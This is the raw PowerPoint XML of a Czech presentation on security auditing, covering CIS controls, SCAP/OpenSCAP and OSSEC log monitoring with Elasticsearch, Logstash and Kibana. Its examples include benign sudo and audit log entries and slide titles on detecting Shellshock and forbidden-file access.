              <a:t>/www/html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Geoip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> 93.189.26.18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Austria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Wien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, IPAX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>og</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>austria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0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CIS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(Center </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t> internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2800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2800" dirty="0"/>
              <a:t>for Small- and Medium-Sized Enterprises (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>SME)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82" y="2429208"/>
            <a:ext cx="8458635" cy="990651"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextovéPole 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866682" y="3833090"/>
            <a:ext cx="84586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b="1" dirty="0" smtClean="0"/>
              <a:t>Znát</a:t>
            </a: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sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Ochrana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/>
              <a:t>Příprava</a:t>
            </a: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CIS využívá sílu globální IT komunity, která chrání veřejné a soukromé organizace před kybernetickými hrozbami.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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7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03</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Vyhledání</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>SUDO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>command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STROJ03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Nov 22 16:24:55 rp01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: mjina : TTY=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>pts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/3 ; PWD=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/mjina ; USER=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> ; COMMAND=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Uživatel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t> MJINA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>provedl pod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> právy příkaz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> -l – výpis adresáře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58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Root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>command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Zjištění </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> příkazů od administrátorů pod privilegii </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>roota</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Provedeno pod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> účtem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>CRM_mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> -1r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>type=EXECVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>=audit(1479830777.475:52766029): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>=2 a0="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>crm_mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>" a1="-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>r1„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5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Dotazy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Prezentace Umístěna na webu https://openprime.cz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3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1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>ZnáT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(znalost prostředí)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67345"/>
            <a:ext cx="10363826" cy="399011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Prvním </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>krokem, který </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>pomůže </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>pokročit v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>úsilí zabezpečení systému </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>v oblasti kybernetické bezpečnosti, je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>znalost vaši </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>síTě</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>včetně připojených </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>aktivních či pasivních zařízení</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, kritických </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>dat, operačního a aplikačního softwaru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Bez jasného pochopení, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>co </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>máte a musíte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>chránit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Lze jen obtížně </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>zajistit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>pokrytí bezpečnosti a zbytečné vynaložení vašeho </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>úsilí v oblasti počítačové bezpečnosti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několik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>klíčových </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>otázek o kterých musíme přemýšlet:</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Víte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, co je připojeno k vaší síti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>?			•   Víte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, který software je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>								   nainstalován</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Víte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, zda správci a uživatelé používají silná hesla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>? 	• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Víte, kde jsou vaše nejdůležitější </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>							   data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>uložena v síti?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1"/>
            <a:ext cx="3558886" cy="19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2: Ochrana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Chraňte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>svůj majetek</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Jak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>se říká, starší (profesně) zaměstnanci </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>jsou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>nejcennějším majetkem, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>a to je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>pravda pokud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>jde o bezpečnost. Ochrana vašich informací vyžaduje nejen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>technologické řešení</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, ale také povědomí zaměstnanců, aby se zabránilo náhodnému poškození vašich systémů.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Tato fáze se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>zaměřuje </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>na ochranu vašich počítačů a na vzdělávání vašich </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>uživatelů na role </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>v kybernetické bezpečnosti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Položme si otázky:</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Nastavujete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>počítač s ohledem na bezpečnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>? (CIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>benchmark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 smtClean="0"/>
              <a:t>Spouští </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>vaše síť aktuální software proti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>malwaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Vzděláváte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>své uživatele v oblasti osvědčených postupů v oblasti počítačové bezpečnosti?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35" y="125874"/>
            <a:ext cx="3897110" cy="25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3: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Připravte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>svou organizaci</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Jakmile vaše organizace vytvoří </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>silné zázemí </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>pro kybernetickou bezpečnost, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>je potřeba vědět jak na určité vaše věci </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>reagovat. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Musíme zvládnout schopnost, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>jak zvládnout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>počítačový bezpečnostní incident, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>jak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>ho opravit, vyloučit potencionální poplach a vrátit se k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>podnikání.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Pár otázek k zodpovězení:</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Víte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, kdy jste naposledy zálohovali kritické soubory?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Pravidelně </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>ověřujete, zda jsou zálohy dokončeny?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Víte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, koho kontaktovat, pokud dojde k incidentu?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66" y="139843"/>
            <a:ext cx="4226145" cy="23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cs-CZ" dirty="0"/>
              <a:t>Přizpůsobení infrastruktury společnosti tak, aby vyhovovalo konkrétním požadavkům na dodržování předpisů, obvykle není oblíbeným úkolem jakéhokoli systému nebo bezpečnostního inženýra. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>open-source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>OpenSCAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> (Open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Automation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) pomáhá ulehčit tento úkol.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82" y="4019454"/>
            <a:ext cx="4763367" cy="26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automatizovaný Proces - SCAP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Jednoduché </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>procházení, každá kontrola, zvlášť při více systémech </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>je zdlouhavé a časově </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>náročné.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>proto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Národní ústav pro normalizaci a technologii (NIST) přišel s procesem automatizace tohoto úkolu. Říká se tomu "Protokol automatizace zabezpečení </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>obsahu“, „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Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty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“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>(SCAP). </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>SCAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>integruje řadu standardních metod popsáním souborů konfigurace systému a správy zabezpečení jako součásti souborů XML. Tyto soubory XML lze potom analyzovat pomocí skeneru a kontrolovat je podle aktuální konfigurace systému.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6303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Integrace SCAP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SCAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>integruje </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>standardy jako CVE, CCE, CPE, CVSS, OVAL a XCCDF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Formát formátu popisu (XCCDF) pro rozšíření konfigurace pomáhá definovat zásady, které by zajistily bezpečnou konfiguraci IT systémů. Aby bylo možné prověřit proti těmto zásadám, vyžadují různé testy. </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Jazyk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>otevřené chyby zabezpečení a hodnocení (OVAL) popisuje ty testovací postupy založené na souborech XML. OVAL definice mohou být buď použity "samostatně", nebo také kombinovány s existujícími šablonami XCCDF, například pro bezpečný a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>čistý </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>konfigurační standard webového serveru běžící na systému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Enterprise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> Linux.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7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1995</TotalTime>
  <Words>1145</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Širokoúhlá obrazovka</PresentationFormat>
  <Paragraphs>153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Lucida Console</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Kapka</vt:lpstr>
      <vt:lpstr>IT Bezpečnost, Auditing firewallů, switchů, Linux a Windows systémů v základu.</vt:lpstr>
      <vt:lpstr>IT v praxi</vt:lpstr>
      <vt:lpstr>CIS (Center for internet security) for Small- and Medium-Sized Enterprises (SME)</vt:lpstr>
      <vt:lpstr>Fáze 1: ZnáT  (znalost prostředí)</vt:lpstr>
      <vt:lpstr>Fáze 2: Ochrana</vt:lpstr>
      <vt:lpstr>Fáze 3: Příprava</vt:lpstr>
      <vt:lpstr>SCAP</vt:lpstr>
      <vt:lpstr>Proč automatizovaný Proces - SCAP</vt:lpstr>
      <vt:lpstr>Standardy Integrace SCAP</vt:lpstr>
      <vt:lpstr>Red hat - SCAP</vt:lpstr>
      <vt:lpstr>Prezentace auditního systému OSSEC</vt:lpstr>
      <vt:lpstr>OSSEC přes SIEMs</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>OSSEC Log Management S Elasticsearch</vt:lpstr>
      <vt:lpstr>Elasticsearch</vt:lpstr>
      <vt:lpstr>Logstash</vt:lpstr>
      <vt:lpstr>Kibana</vt:lpstr>
      <vt:lpstr>OSSEC Pro PCI DSS</vt:lpstr>
      <vt:lpstr>Log analysis</vt:lpstr>
      <vt:lpstr>Rootcheck – Policy monitoring</vt:lpstr>
      <vt:lpstr>Rootcheck - Rootkits detection</vt:lpstr>
      <vt:lpstr>File Integrity Monitoring - syscheck</vt:lpstr>
      <vt:lpstr>aktivní odezva ACTIVE RESPONSE</vt:lpstr>
      <vt:lpstr>ELK elasticsearch – logstash - kibana</vt:lpstr>
      <vt:lpstr>Ossec integrace openscap, ELK</vt:lpstr>
      <vt:lpstr>Datové toky</vt:lpstr>
      <vt:lpstr>Příklad 01 Zjištění problému  Shellshock attack</vt:lpstr>
      <vt:lpstr>Příklad 02 Attempt to access  forbidden file or directory</vt:lpstr>
      <vt:lpstr>Příklad 03 Vyhledání SUDO root command</vt:lpstr>
      <vt:lpstr>Root command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auditního systému OSSEC</dc:title>
  <dc:creator>mjina</dc:creator>
  <cp:lastModifiedBy>Martin Jína</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-22T14:34:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-26T18:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>